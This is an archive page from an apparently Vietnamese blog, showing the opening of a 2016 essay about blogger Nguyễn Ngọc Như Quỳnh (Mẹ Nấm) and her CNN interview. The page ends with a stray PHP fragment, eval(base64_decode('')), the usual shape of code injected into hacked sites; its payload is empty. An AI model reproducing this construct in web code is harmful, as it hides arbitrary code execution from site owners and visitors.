Archive for October 11th, 2016

NGUYỄN NGỌC NHƯ QUỲNH, AI SẼ NÓI THAY EM?

NGUYỄN NGỌC NHƯ QUỲNH, AI SẼ NÓI THAY EM?

“Nếu bạn im lặng rồi ai sẽ nói” (who will speak if you do not) là câu nói mà Nguyễn Ngọc Như Quỳnh, tức Blogger Mẹ Nấm, dùng để kết luận cho buổi phỏng vấn của phái viên CNN Andrew Stevens ngày 18 tháng 6, 2010 tại Sài Gòn. Chương trình Viet

10.11.2016 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>